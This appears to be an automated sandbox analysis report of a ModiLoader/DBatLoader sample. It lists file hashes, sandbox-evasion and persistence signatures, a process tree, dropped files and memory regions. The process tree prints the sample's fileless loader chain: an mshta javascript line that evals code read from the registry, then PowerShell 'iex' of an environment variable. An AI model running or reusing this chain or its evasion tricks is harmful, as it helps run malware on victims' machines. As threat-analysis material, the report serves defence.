Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2024 20:46

General

  • Target

    2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe

  • Size

    250KB

  • MD5

    2ba1c0b0c9458f637f49dfb4e8df4af8

  • SHA1

    90a29617f1d625d3c33e2f852bd989856ee72832

  • SHA256

    14a737941a547cce90d0b670863658693d7d6660cc36c102bccf8ef741848bff

  • SHA512

    d1d2146838d8f4763efc5bf2194d22ca728e42d89127c86c25f1ec6082117c6c93d37800cf8e13239f0256891449f7f1362299e4cf83ef38ddc11683330bbe3a

  • SSDEEP

    6144:BZxIRAs8p5ZNpAglT8wKjoVzODs4Bcn8y4pwBAR7VK4Fo+ufX6eH:BZxIA5FAs8fizAtmBABE4uxH

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 61 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Users\Admin\AppData\Local\Temp\2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe"
      2⤵
        PID:2876
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:RT65vb="B";C2V=new%20ActiveXObject("WScript.Shell");UzYih4Q6D="MZN78KQy";TQky4=C2V.RegRead("HKLM\\software\\Wow6432Node\\5dxZ04D\\qNMjlX");ZEep7wV7="tTe2";eval(TQky4);sPakz1S="jtsi";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:liuqexb
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2148
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:2376

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\Local\529d1c\1bcd8a.lnk

        Filesize

        881B

        MD5

        7456158805a081526af24c02a7a6ae6d

        SHA1

        36db31bb5c4fd4a0ec3ed2d18ee9a94a0c256a2a

        SHA256

        92f81b0a82837322ec028154795ddddb8f9464f2a140a9b492b786e255f90637

        SHA512

        3b4eb5b8eaaad5f6d38bad47ef5be8508e679e84f1191c0f02abb85d90fc1f176170dda2f0e95d255362227c7eb2dab3a833876b8a2077b39cad77b2fc935c6e

      • C:\Users\Admin\AppData\Local\529d1c\4bd7f2.bat

        Filesize

        61B

        MD5

        7f145f9c460ee7bb55a3e7ad72a65f86

        SHA1

        39a73f2119c72ae27a166fff9ceb13859f6ac21b

        SHA256

        16e3704ce7a5f142fe817cd42cf9fd214341caf20a284c439457feb84515ddad

        SHA512

        1bfbf2931d904ae08d6552267b918e8f7e6cce6d142f0c950c74e2e601dc3cf36428fcddf67ad3cae1acb565edf4871c0c3c165be88c34d3c81b68b8d7c1a75f

      • C:\Users\Admin\AppData\Local\529d1c\7fd902.cbe78f1

        Filesize

        34KB

        MD5

        acd095cf322000838c36a72fa096a459

        SHA1

        140f80c3d1d01eebdce25209178a6e4f4537cbbd

        SHA256

        7bc51e006dd0d7eedbb9f0eef93217df2d3fab66063adbc0bde2f2022fa30c3b

        SHA512

        28f76377d1b9b42ae59ab79a81ef765e47340dc5866f9dbb898d568b32f53014ab6ff0517f2d1ddcf1957db3ada5b588bdfd22c6a331657557a128e6439deed1

      • C:\Users\Admin\AppData\Local\Temp\Tar24B7.tmp

        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      • C:\Users\Admin\AppData\Roaming\4f4be6\d3bc4d.cbe78f1

        Filesize

        32KB

        MD5

        f8b28811957a511896368d4ce846be65

        SHA1

        6912b736b99f8ea62aabbf2f7a37ad84f98408ba

        SHA256

        1545b2eb63c0c5abb6929c973be838f2c7158ddf5925cb931a079a634c04e30e

        SHA512

        444587ed231ae9b763b9d834d4e3e609c5380d95ea6eeca1a9f856ab989551e289df581e7c2ab7c8388679681867f9a48aa0f03e88aa64ba977b4104eea1f9cf

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk

        Filesize

        991B

        MD5

        3f20cf8378253a2d9d05b6e0b95288ee

        SHA1

        dbcaa66e8427bf3caef684ec46cdadea9852efcc

        SHA256

        5b3ea80e47b317f9ff96a1b5f279c8745614ffa8c98469db14ba26784726ea12

        SHA512

        205c38b547afeca8e3165a721a831a93c0e1ae87fd15918e52db37be0bb56664b68603bbcd5b4b366eca9731f5bc9025c4d264fd9d5aa06e22a551e33e65650a

      • memory/1676-91-0x0000000074840000-0x0000000074DEB000-memory.dmp

        Filesize

        5.7MB

      • memory/1676-9-0x0000000074840000-0x0000000074DEB000-memory.dmp

        Filesize

        5.7MB

      • memory/1676-8-0x0000000074840000-0x0000000074DEB000-memory.dmp

        Filesize

        5.7MB

      • memory/1676-0-0x0000000074841000-0x0000000074842000-memory.dmp

        Filesize

        4KB

      • memory/2148-127-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-142-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-125-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-126-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-128-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-129-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-130-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-131-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-132-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-133-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-138-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-139-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-140-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-108-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-107-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-118-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-117-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-116-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-115-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-114-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-113-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-112-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-111-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-141-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-121-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-120-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-119-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-122-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-124-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-123-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-143-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2148-150-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2204-106-0x0000000006370000-0x0000000006446000-memory.dmp

        Filesize

        856KB

      • memory/2204-110-0x0000000006370000-0x0000000006446000-memory.dmp

        Filesize

        856KB

      • memory/2376-153-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-162-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-159-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-161-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-151-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-155-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-152-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-154-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-156-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-157-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-158-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2376-160-0x00000000000D0000-0x0000000000211000-memory.dmp

        Filesize

        1.3MB

      • memory/2876-99-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-84-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2876-90-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2876-102-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-98-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-97-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-95-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-86-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

      • memory/2876-85-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2876-96-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-94-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-83-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2876-189-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-93-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-92-0x0000000000920000-0x00000000009F6000-memory.dmp

        Filesize

        856KB

      • memory/2876-88-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2876-81-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2876-82-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB